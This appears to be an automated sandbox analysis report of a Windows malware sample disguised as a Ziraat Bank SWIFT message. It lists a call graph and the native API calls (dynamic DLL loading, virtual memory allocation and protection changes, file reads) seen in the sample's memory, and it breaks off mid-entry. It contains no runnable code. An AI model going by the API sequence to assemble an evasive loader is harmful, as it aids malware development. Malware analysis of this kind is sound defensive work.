32177 41fa27 32175->32177 32428 41e187 32177->32428 32179 41ef40 32179->32054 32181 418760 32180->32181 32182 41eae7 LdrLoadDll 32180->32182 32181->32121 32181->32122 32181->32125 32182->32181 32184 41eae7 LdrLoadDll 32183->32184 32185 41de93 NtCreateFile 32184->32185 32185->32126 32187 418303 32186->32187 32188 41ddf7 LdrLoadDll 32187->32188 32189 418324 32188->32189 32190 41832b 32189->32190 32191 41833f 32189->32191 32193 41dfa7 2 API calls 32190->32193 32192 41dfa7 2 API calls 32191->32192 32194 418348 32192->32194 32195 418334 32193->32195 32250 41fb47 LdrLoadDll RtlAllocateHeap 32194->32250 32195->32150 32197 418353 32197->32150 32199 418052 32198->32199 32200 418085 32198->32200 32202 41ddf7 LdrLoadDll 32199->32202 32201 4181d0 32200->32201 32205 4180a1 32200->32205 32203 41ddf7 LdrLoadDll 32201->32203 32204 41806d 32202->32204 32210 4181eb 32203->32210 32206 41dfa7 2 API calls 32204->32206 32208 41ddf7 LdrLoadDll 32205->32208 32207 418076 32206->32207 32207->32153 32209 4180bc 32208->32209 32212 4180c3 32209->32212 32213 4180d8 32209->32213 32263 41de37 LdrLoadDll 32210->32263 32215 41dfa7 2 API calls 32212->32215 32216 4180f3 32213->32216 32217 4180dd 32213->32217 32214 418225 32218 41dfa7 2 API calls 32214->32218 32219 4180cc 32215->32219 32225 4180f8 32216->32225 32251 41fb07 32216->32251 32220 41dfa7 2 API calls 32217->32220 32221 418230 32218->32221 32219->32153 32222 4180e6 32220->32222 32221->32153 32222->32153 32227 41810a 32225->32227 32254 41df27 32225->32254 32226 41815e 32228 418175 32226->32228 32262 41ddb7 LdrLoadDll 32226->32262 32227->32153 32230 418191 32228->32230 32231 41817c 32228->32231 32233 41dfa7 2 API calls 32230->32233 32232 41dfa7 2 API calls 32231->32232 32232->32227 32234 41819a 32233->32234 32235 4181c6 32234->32235 32257 41f827 32234->32257 32235->32153 32237 4181b1 32238 41fa27 2 API calls 32237->32238 32239 4181ba 32238->32239 32239->32153 32240->32125 32241->32147 32243 41eae7 LdrLoadDll 32242->32243 32244 418939 32243->32244 32245 41de37 LdrLoadDll 32244->32245 32245->32149 32247 41dfc3 NtClose 32246->32247 32248 41eae7 LdrLoadDll 32246->32248 32247->32154 32248->32247 32249->32134 32250->32197 32264 41e147 32251->32264 32253 41fb1f 32253->32225 32255 41eae7 LdrLoadDll 32254->32255 32256 41df43 NtReadFile 32255->32256 32256->32226 32258 41f834 32257->32258 32259 41f84b 32257->32259 32258->32259 32260 41fb07 2 API calls 32258->32260 32259->32237 32261 41f862 32260->32261 32261->32237 32262->32228 32263->32214 32265 41e163 RtlAllocateHeap 32264->32265 32266 41eae7 LdrLoadDll 32264->32266 32265->32253 32266->32265 32268 41f9d4 32267->32268 32398 41e057 32267->32398 32268->32159 32271 417c68 32270->32271 32272 417c70 32270->32272 32271->32161 32301 417f43 32272->32301 32401 420ae7 32272->32401 32274 417cc4 32275 420ae7 2 API calls 32274->32275 32278 417ccf 32275->32278 32276 417d1d 32279 420ae7 2 API calls 32276->32279 32278->32276 32280 420c17 3 API calls 32278->32280 32412 420b87 LdrLoadDll RtlAllocateHeap RtlFreeHeap 32278->32412 32282 417d31 32279->32282 32280->32278 32281 417d8e 32283 420ae7 2 API calls 32281->32283 32282->32281 32406 420c17 32282->32406 32285 417da4 32283->32285 32286 417de1 32285->32286 32289 420c17 3 API calls 32285->32289 32287 420ae7 2 API calls 32286->32287 32288 417dec 32287->32288 32290 420c17 3 API calls 32288->32290 32298 417e26 32288->32298 32289->32285 32290->32288 32292 417f1b 32414 420b47 LdrLoadDll RtlFreeHeap 32292->32414 32294 417f25 32415 420b47 LdrLoadDll RtlFreeHeap 32294->32415 32296 417f2f 32416 420b47 LdrLoadDll RtlFreeHeap 32296->32416 32413 420b47 LdrLoadDll RtlFreeHeap 32298->32413 32299 417f39 32417 420b47 LdrLoadDll RtlFreeHeap 32299->32417 32301->32161 32303 418fc8 32302->32303 32304 418667 8 API calls 32303->32304 32308 418fde 32304->32308 32305 418fe7 32305->32165 32306 41901e 32307 41fa27 2 API calls 32306->32307 32309 41902f 32307->32309 32308->32305 32308->32306 32310 41906a 32308->32310 32309->32165 32311 41fa27 2 API calls 32310->32311 32312 41906f 32311->32312 32312->32165 32314 41e8eb 32313->32314 32315 41e767 LdrLoadDll 32313->32315 32418 41e767 32314->32418 32315->32314 32317 41e8f4 32318 41e767 LdrLoadDll 32317->32318 32319 41e8fd 32318->32319 32320 41e767 LdrLoadDll 32319->32320 32321 41e906 32320->32321 32322 41e767 LdrLoadDll 32321->32322 32323 41e90f 32322->32323 32324 41e767 LdrLoadDll 32323->32324 32325 41e918 32324->32325 32326 41e767 LdrLoadDll 32325->32326 32327 41e924 32326->32327 32328 41e767 LdrLoadDll 32327->32328 32329 41e92d 32328->32329 32330 41e767 LdrLoadDll 32329->32330 32331 41e936 32330->32331 32332 41e767 LdrLoadDll 32331->32332 32333 41e93f 32332->32333 32334 41e767 LdrLoadDll 32333->32334 32335 41e948 32334->32335 32336 41e767 LdrLoadDll 32335->32336 32337 41e951 32336->32337 32338 41e767 LdrLoadDll 32337->32338 32339 41e95d 32338->32339 32340 41e767 LdrLoadDll 32339->32340 32341 41e966 32340->32341 32342 41e767 LdrLoadDll 32341->32342 32343 41e96f 32342->32343 32344 41e767 LdrLoadDll 32343->32344 32345 41e978 32344->32345 32346 41e767 LdrLoadDll 32345->32346 32347 41e981 32346->32347 32348 41e767 LdrLoadDll 32347->32348 32349 41e98a 32348->32349 32350 41e767 LdrLoadDll 32349->32350 32351 41e996 32350->32351 32352 41e767 LdrLoadDll 32351->32352 32353 41e99f 32352->32353 32354 41e767 LdrLoadDll 32353->32354 32355 41e9a8 32354->32355 32356 41e767 LdrLoadDll 32355->32356 32357 41e9b1 32356->32357 32358 41e767 LdrLoadDll 32357->32358 32359 41e9ba 32358->32359 32360 41e767 LdrLoadDll 32359->32360 32361 41e9c3 32360->32361 32362 41e767 LdrLoadDll 32361->32362 32363 41e9cf 32362->32363 32364 41e767 LdrLoadDll 32363->32364 32365 41e9d8 32364->32365 32366 41e767 LdrLoadDll 32365->32366 32367 41e9e1 32366->32367 32368 41e767 LdrLoadDll 32367->32368 32369 41e9ea 32368->32369 32370 41e767 LdrLoadDll 32369->32370 32371 41e9f3 32370->32371 32372 41e767 LdrLoadDll 32371->32372 32373 41e9fc 32372->32373 32374 41e767 LdrLoadDll 32373->32374 32375 41ea08 32374->32375 32376 41e767 LdrLoadDll 32375->32376 32377 41ea11 32376->32377 32378 41e767 LdrLoadDll 32377->32378 32379 41ea1a 32378->32379 32380 41e767 LdrLoadDll 32379->32380 32381 41ea23 32380->32381 32382 41e767 LdrLoadDll 32381->32382 32383 41ea2c 32382->32383 32384 41e767 LdrLoadDll 32383->32384 32385 41ea35 32384->32385 32386 41e767 LdrLoadDll 32385->32386 32387 41ea41 32386->32387 32388 41e767 LdrLoadDll 32387->32388 32389 41ea4a 32388->32389 32390 41e767 LdrLoadDll 32389->32390 32391 41ea53 32390->32391 32391->32169 32393 41eae7 LdrLoadDll 32392->32393 32394 41d9f3 32393->32394 32424 18d9860 LdrInitializeThunk 32394->32424 32395 41da0a 32395->32091 32397->32166 32399 41eae7 LdrLoadDll 32398->32399 32400 41e073 NtAllocateVirtualMemory 32399->32400 32400->32268 32402 420af7 32401->32402 32403 420afd 32401->32403 32402->32274 32404 41fb07 2 API calls 32403->32404 32405 420b23 32404->32405 32405->32274 32407 420b87 32406->32407 32408 41fb07 2 API calls 32407->32408 32409 420be4 32407->32409 32410 420bc1 32408->32410 32409->32282 32411 41fa27 2 API calls 32410->32411 32411->32409 32412->32278 32413->32292 32414->32294 32415->32296 32416->32299 32417->32301 32419 41e782 32418->32419 32420 418a77 LdrLoadDll 32419->32420 32421 41e7a2 32420->32421 32422 418a77 LdrLoadDll 32421->32422 32423 41e856 32421->32423 32422->32423 32423->32317 32424->32395 32426 18d968f LdrInitializeThunk 32425->32426 32427 18d9681 32425->32427 32426->32175 32427->32175 32429 41e1a3 RtlFreeHeap 32428->32429 32430 41eae7 LdrLoadDll 32428->32430 32429->32179 32430->32429 32432 408922 32431->32432 32433 408927 32431->32433 32432->32099 32434 41f9a7 2 API calls 32433->32434 32440 40894c 32434->32440 32435 4089af 32435->32099 32436 41d9d7 2 API calls 32436->32440 32437 4089b5 32439 4089db 32437->32439 32441 41e0d7 2 API calls 32437->32441 32439->32099 32440->32435 32440->32436 32440->32437 32442 41f9a7 2 API calls 32440->32442 32447 41e0d7 32440->32447 32443 4089cc 32441->32443 32442->32440 32443->32099 32445 408bf5 32444->32445 32446 41e0d7 2 API calls 32444->32446 32445->32056 32446->32445 32448 41e0f3 32447->32448 32449 41eae7 LdrLoadDll 32447->32449 32452 18d96e0 LdrInitializeThunk 32448->32452 32449->32448 32450 41e10a 32450->32440 32452->32450 32454 41f1aa 32453->32454 32457 40c307 32454->32457 32458 40c32b 32457->32458 32459 40b231 32458->32459 32460 40c367 LdrLoadDll 32458->32460 32459->32062 32460->32459 32462 40c67a 32461->32462 32463 40c6f7 32462->32463 32476 41d7a7 LdrLoadDll 32462->32476 32463->32069 32466 41eae7 LdrLoadDll 32465->32466 32467 40f362 32466->32467 32467->32077 32468 41e2e7 32467->32468 32469 41e306 LookupPrivilegeValueW 32468->32469 32470 41eae7 LdrLoadDll 32468->32470 32469->32073 32470->32469 32472 41eae7 LdrLoadDll 32471->32472 32473 41dd93 32472->32473 32477 18d9910 LdrInitializeThunk 32473->32477 32474 41ddb2 32474->32076 32476->32463 32477->32474 32479 40c7fe 32478->32479 32480 40c657 LdrLoadDll 32479->32480 32481 40c861 32480->32481 32481->31994 32483 40f451 32482->32483 32491 40f507 32482->32491 32484 40c657 LdrLoadDll 32483->32484 32485 40f473 32484->32485 32492 41da57 32485->32492 32487 40f4b5 32495 41da97 32487->32495 32490 41dfa7 2 API calls 32490->32491 32491->31997 32491->31998 32493 41eae7 LdrLoadDll 32492->32493 32494 41da73 32493->32494 32494->32487 32496 41dab3 32495->32496 32497 41eae7 LdrLoadDll 32495->32497 32500 18d9fe0 LdrInitializeThunk 32496->32500 32497->32496 32498 40f4fb 32498->32490 32500->32498 32502 40c464 32501->32502 32503 40c468 32501->32503 32502->32013 32504 40c4b3 32503->32504 32506 40c481 32503->32506 32564 41d7e7 LdrLoadDll 32504->32564 32563 41d7e7 LdrLoadDll 32506->32563 32507 40c4c4 32507->32013 32509 40c4a3 32509->32013 32511 40f5f7 3 API calls 32510->32511 32512 417fbd 32510->32512 32511->32512 32512->32015 32565 409757 32513->32565 32515 40974d 32515->32017 32516 409545 32516->32515 32517 408917 4 API calls 32516->32517 32518 409623 32516->32518 32527 409583 32517->32527 32518->32515 32520 408917 4 API calls 32518->32520 32534 409703 32518->32534 32531 409660 32520->32531 32521 409717 32521->32515 32613 40f867 10 API calls 32521->32613 32523 40972d 32523->32515 32614 40f867 10 API calls 32523->32614 32525 409743 32525->32017 32527->32518 32528 409619 32527->32528 32579 409207 32527->32579 32529 408bd7 2 API calls 32528->32529 32529->32518 32530 409207 17 API calls 32530->32531 32531->32530 32532 4096f9 32531->32532 32531->32534 32533 408bd7 2 API calls 32532->32533 32533->32534 32534->32515 32612 40f867 10 API calls 32534->32612 32536 41eae7 LdrLoadDll 32535->32536 32537 41e033 32536->32537 32751 18d98f0 LdrInitializeThunk 32537->32751 32538 40d2b9 32540 40f5f7 32538->32540 32541 40f614 32540->32541 32752 41dad7 32541->32752 32544 40f65c 32544->32021 32545 41db27 2 API calls 32546 40f685 32545->32546 32546->32021 32548 41db2d 32547->32548 32549 41eae7 LdrLoadDll 32548->32549 32550 41db43 32549->32550 32758 18d9780 LdrInitializeThunk 32550->32758 32551 40d31c 32551->32027 32551->32030 32554 41eae7 LdrLoadDll 32553->32554 32555 41db93 32554->32555 32759 18d97a0 LdrInitializeThunk 32555->32759 32556 40d3f0 32556->32038 32559 41eae7 LdrLoadDll 32558->32559 32560 41d953 32559->32560 32760 18d9a20 LdrInitializeThunk 32560->32760 32561 40d443 32561->32042 32563->32509 32564->32507 32566 40977e 32565->32566 32567 408917 4 API calls 32566->32567 32574 4099d3 32566->32574 32568 4097d1 32567->32568 32569 408bd7 2 API calls 32568->32569 32568->32574 32570 409860 32569->32570 32571 408917 4 API calls 32570->32571 32570->32574 32572 409875 32571->32572 32573 408bd7 2 API calls 32572->32573 32572->32574 32576 4098d5 32573->32576 32574->32516 32575 408917 4 API calls 32575->32576 32576->32574 32576->32575 32577 409207 17 API calls 32576->32577 32578 408bd7 2 API calls 32576->32578 32577->32576 32578->32576 32580 40922c 32579->32580 32615 41d827 32580->32615 32583 409280 32583->32527 32584 409301 32650 40f747 LdrLoadDll NtClose 32584->32650 32585 41da17 2 API calls 32586 4092a4 32585->32586 32586->32584 32587 4092af 32586->32587 32589 40932d 32587->32589 32618 40d457 32587->32618 32589->32527 32590 40931c 32592 409323 32590->32592 32593 409339 32590->32593 32595 41dfa7 2 API calls 32592->32595 32651 41d8a7 LdrLoadDll 32593->32651 32594 4092c9 32594->32589 32638 409037 32594->32638 32595->32589 32597 409364 32599 40d457 5 API calls 32597->32599 32601 409384 32599->32601 32601->32589 32652 41d8d7 LdrLoadDll 32601->32652 32603 4093a9 32653 41d967 LdrLoadDll 32603->32653 32605 4093c3 32606 41d937 2 API calls 32605->32606 32607 4093d2 32606->32607 32608 41dfa7 2 API calls 32607->32608 32609 4093dc 32608->32609 32654 408e07 32609->32654 32611 4093f0 32611->32527 32612->32521 32613->32523 32614->32525 32616 409276 32615->32616 32617 41eae7 LdrLoadDll 32615->32617 32616->32583 32616->32584 32616->32585 32617->32616 32620 40d482 32618->32620 32619 40f5f7 3 API calls 32621 40d4e1 32619->32621 32620->32619 32622 40d52a 32621->32622 32623 41db27 2 API calls 32621->32623 32622->32594 32624 40d50c 32623->32624 32625 40d513 32624->32625 32628 40d536 32624->32628 32626 41db77 2 API calls 32625->32626 32627 40d520 32626->32627 32629 41dfa7 2 API calls 32627->32629 32630 40d5a0 32628->32630 32631 40d580 32628->32631 32629->32622 32633 41db77 2 API calls 32630->32633 32632 41dfa7 2 API calls 32631->32632 32635 40d58d 32632->32635 32634 40d5b2 32633->32634 32636 41dfa7 2 API calls 32634->32636 32635->32594 32637 40d5bc 32636->32637 32637->32594 32639 40904d 32638->32639 32670 41d347 32639->32670 32641 4091d8 32641->32527 32642 409066 32642->32641 32691 408c17 32642->32691 32644 40914c 32644->32641 32645 408e07 11 API calls 32644->32645 32646 40917a 32645->32646 32646->32641 32647 41da17 2 API calls 32646->32647 32648 4091af 32647->32648 32648->32641 32649 41e017 2 API calls 32648->32649 32649->32641 32650->32590 32651->32597 32652->32603 32653->32605 32655 408e30 32654->32655 32730 408d77 32655->32730 32658 41e017 2 API calls 32659 408e43 32658->32659 32659->32658 32660 408ece 32659->32660 32662 408ec9 32659->32662 32738 40f7c7 32659->32738 32660->32611 32661 41dfa7 2 API calls 32663 408f01 32661->32663 32662->32661 32663->32660 32664 41d827 LdrLoadDll 32663->32664 32665 408f66 32664->32665 32665->32660 32742 41d867 32665->32742 32667 408fca 32667->32660 32668 418667 8 API calls 32667->32668 32669 40901f 32668->32669 32669->32611 32671 41fb07 2 API calls 32670->32671 32672 41d35e 32671->32672 32698 40a967 32672->32698 32674 41d379 32675 41d39a 32674->32675 32676 41d3ae 32674->32676 32677 41fa27 2 API calls 32675->32677 32679 41f9a7 2 API calls 32676->32679 32678 41d3a4 32677->32678 32678->32642 32680 41d415 32679->32680 32681 41f9a7 2 API calls 32680->32681 32682 41d42e 32681->32682 32688 41d6fe 32682->32688 32704 41f9e7 32682->32704 32685 41d6ea 32686 41fa27 2 API calls 32685->32686 32687 41d6f4 32686->32687 32687->32642 32689 41fa27 2 API calls 32688->32689 32690 41d753 32689->32690 32690->32642 32692 408d16 32691->32692 32693 408c2c 32691->32693 32692->32644 32693->32692 32694 418667 8 API calls 32693->32694 32695 408c99 32694->32695 32696 41fa27 2 API calls 32695->32696 32697 408cc0 32695->32697 32696->32697 32697->32644 32699 40a98c 32698->32699 32700 40c307 LdrLoadDll 32699->32700 32701 40a9bf 32700->32701 32703 40a9e4 32701->32703 32707 40de87 32701->32707 32703->32674 32724 41e097 32704->32724 32708 40deb3 32707->32708 32709 41dcf7 LdrLoadDll 32708->32709 32710 40decc 32709->32710 32711 40ded3 32710->32711 32718 41dd37 32710->32718 32711->32703 32715 40df0e 32716 41dfa7 2 API calls 32715->32716 32717 40df31 32716->32717 32717->32703 32719 41dd53 32718->32719 32720 41eae7 LdrLoadDll 32718->32720 32722 18d9710 LdrInitializeThunk 32719->32722 32720->32719 32721 40def6 32721->32711 32723 41e327 LdrLoadDll 32721->32723 32722->32721 32723->32715 32725 41eae7 LdrLoadDll 32724->32725 32726 41e0b3 32725->32726 32729 18d9a00 LdrInitializeThunk 32726->32729 32727 41d6e3 32727->32685 32727->32688 32729->32727 32731 408d8f 32730->32731 32732 40c307 LdrLoadDll 32731->32732 32733 408daa 32732->32733 32734 418a77 LdrLoadDll 32733->32734 32735 408dba 32734->32735 32736 408dc3 PostThreadMessageW 32735->32736 32737 408dd7 32735->32737 32736->32737 32737->32659 32739 40f7da 32738->32739 32745 41d9a7 32739->32745 32743 41d883 32742->32743 32744 41eae7 LdrLoadDll 32742->32744 32743->32667 32744->32743 32746 41eae7 LdrLoadDll 32745->32746 32747 41d9c3 32746->32747 32750 18d9840 LdrInitializeThunk 32747->32750 32748 40f805 32748->32659 32750->32748 32751->32538 32753 41daf3 32752->32753 32754 41eae7 LdrLoadDll 32752->32754 32757 18d99a0 LdrInitializeThunk 32753->32757 32754->32753 32755 40f655 32755->32544 32755->32545 32757->32755 32758->32551 32759->32556 32760->32561 32762 18d9540 LdrInitializeThunk

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 135 41e057-41e094 call 41eae7 NtAllocateVirtualMemory
                                                                    APIs
                                                                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,HD@,00002000,00003000,00000004), ref: 0041E090
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateMemoryVirtual
                                                                    • String ID: HD@
                                                                    • API String ID: 2167126740-1661062907
                                                                    • Opcode ID: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                    • Instruction ID: 23a2446642c9d6fd7ccb81f9b1462f06b40c1544ef3452687a196bf1f7ab25bd
                                                                    • Opcode Fuzzy Hash: ff407167e8468b06ad404ccbb9f5efcd270d3cf321b6c6ce0313f5831c1888d1
                                                                    • Instruction Fuzzy Hash: ABF015B6200208ABCB18DF89DC81EEB77ADAF88754F018109BE0997241C634F810CBB4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 302 4012ac-4014e7 call 4016b0 call 401260 call 401190 call 4016b0 * 2 call 4010a0 call 401730 317 4014f0-4014ff 302->317 318 401501-401504 317->318 319 401512-401519 317->319 318->319 320 401506-40150a 318->320 319->317 321 40151b 319->321 320->319 322 40150c-401510 320->322 323 40151e-401585 NtProtectVirtualMemory call 4016b0 call 422de7 321->323 322->319 324 401586-40158c 322->324 324->323
                                                                    APIs
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MemoryProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2706961497-0
                                                                    • Opcode ID: ec6b929f7a3b9361d41fadd04f4ce49f18b8f921e437c566ef9685ad40d55f9e
                                                                    • Instruction ID: 4de09c8cc9b33c12393b4d7439d677ebb7f18c25de7b711bc7c963b7b625583e
                                                                    • Opcode Fuzzy Hash: ec6b929f7a3b9361d41fadd04f4ce49f18b8f921e437c566ef9685ad40d55f9e
                                                                    • Instruction Fuzzy Hash: B08124B1C2075C9ADB10CFE4CC826EEBBB4BF99304F20531AE514BA291EB7456858B95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 353 4014e9 354 4014f0-4014ff 353->354 355 401501-401504 354->355 356 401512-401519 354->356 355->356 357 401506-40150a 355->357 356->354 358 40151b 356->358 357->356 359 40150c-401510 357->359 360 40151e-401579 NtProtectVirtualMemory call 4016b0 call 422de7 358->360 359->356 361 401586-40158c 359->361 364 40157b-401585 360->364 361->360
                                                                    APIs
                                                                    • NtProtectVirtualMemory.NTDLL(000000FF,00000000,?,00000040,?), ref: 0040153C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: MemoryProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2706961497-0
                                                                    • Opcode ID: e18285a8a531bca169fc2091db84a1696835475928fadfb9be76e0bb8deae53c
                                                                    • Instruction ID: f693b223d72475ec68b2da2ef918186505b5380f3b0f433e747d444ebe02c2a7
                                                                    • Opcode Fuzzy Hash: e18285a8a531bca169fc2091db84a1696835475928fadfb9be76e0bb8deae53c
                                                                    • Instruction Fuzzy Hash: 3D113071C145185AEF28CBB0DC82ADEBB75EB80328F34022EDA21B61A1D33529458F85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 381 41de77-41dec8 call 41eae7 NtCreateFile
                                                                    APIs
                                                                    • NtCreateFile.NTDLL(00000060,00000005,00000000,004187D3,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,004187D3,00000000,00000005,00000060,00000000,00000000), ref: 0041DEC4
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                    • Instruction ID: 1eaccfb85ead4845d064612aa127014a064745f00ec14094b2d6d33b1e2f4596
                                                                    • Opcode Fuzzy Hash: e85e77ba2c54ed5fbcc428c4a95e80045b35a7a87df5efc95b4940160543289c
                                                                    • Instruction Fuzzy Hash: 74F0CFB2200208AFCB08CF89DC85EEB37EDAF8C754F018208BA0D97241C630F851CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 384 41df27-41df70 call 41eae7 NtReadFile
                                                                    APIs
                                                                    • NtReadFile.NTDLL(00418997,00413C77,FFFFFFFF,00418481,00000206,?,00418997,00000206,00418481,FFFFFFFF,00413C77,00418997,00000206,00000000), ref: 0041DF6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileRead
                                                                    • String ID:
                                                                    • API String ID: 2738559852-0
                                                                    • Opcode ID: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                    • Instruction ID: 4024538e1fbe87e491ca00cc97f0d7f4bee8646dc1be07d7c36cc5af1570ee62
                                                                    • Opcode Fuzzy Hash: 46e9d61f60eefd5b9ec08f7c79a1628f979f043a503e788909cff7321939f862
                                                                    • Instruction Fuzzy Hash: 67F0B2B6200208AFCB14DF89DC85EEB77ADEF8C754F118249BE0DA7241D634E811CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041DFCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 62e561e72c89ad0363e60a83810a1f190eebbbd478b3fc0c42d2abe7633d5aa0
                                                                    • Instruction ID: f4162f1668d446339f9cf60689410139b5282d579f811fe9ba08b7388fb6611a
                                                                    • Opcode Fuzzy Hash: 62e561e72c89ad0363e60a83810a1f190eebbbd478b3fc0c42d2abe7633d5aa0
                                                                    • Instruction Fuzzy Hash: E7E0C236240110BFE714EBA6EC89FD73F69DF88390F144255B91D9B283C231E610C7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • NtClose.NTDLL(00418975,00000206,?,00418975,00000005,FFFFFFFF), ref: 0041DFCC
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.372243150.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_401000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close
                                                                    • String ID:
                                                                    • API String ID: 3535843008-0
                                                                    • Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                    • Instruction ID: de09fe6e10c1733f0da70fbdf0456c5acc58387f7b4f985250102f7ee87ff522
                                                                    • Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
                                                                    • Instruction Fuzzy Hash: 12D01776200214ABDA14EBA9DC89ED77BACEF48664F014155BA0D5B242C634FA00CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                                                    • Instruction ID: e0d7bd5a6bfadb0fcf8a9769120b48ce2fc73b95c2fcb489c00796d59b3111b5
                                                                    • Opcode Fuzzy Hash: 210a85ba393020ac1e99eacd22f1bc2bf3bf1943ca8a43b2c8e928e5ef6a7931
                                                                    • Instruction Fuzzy Hash: 159002A134100442D10061994418B160045E7E2381F51C115E6058664DC659CD6A7166
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    • Opcode ID: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                                                    • Instruction ID: a26870dda83c28240fed10a6da1ad643e0199de0f08acfcde9f39b61c7925acb
                                                                    • Opcode Fuzzy Hash: f717b1f4ddf33716d1649c39d170dce374185fa878d2f90e85a5a3702d7ca560
                                                                    • Instruction Fuzzy Hash: 869002A120200003410571994418626404AA7E1381B51C121E60086A0DC56589A97165
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
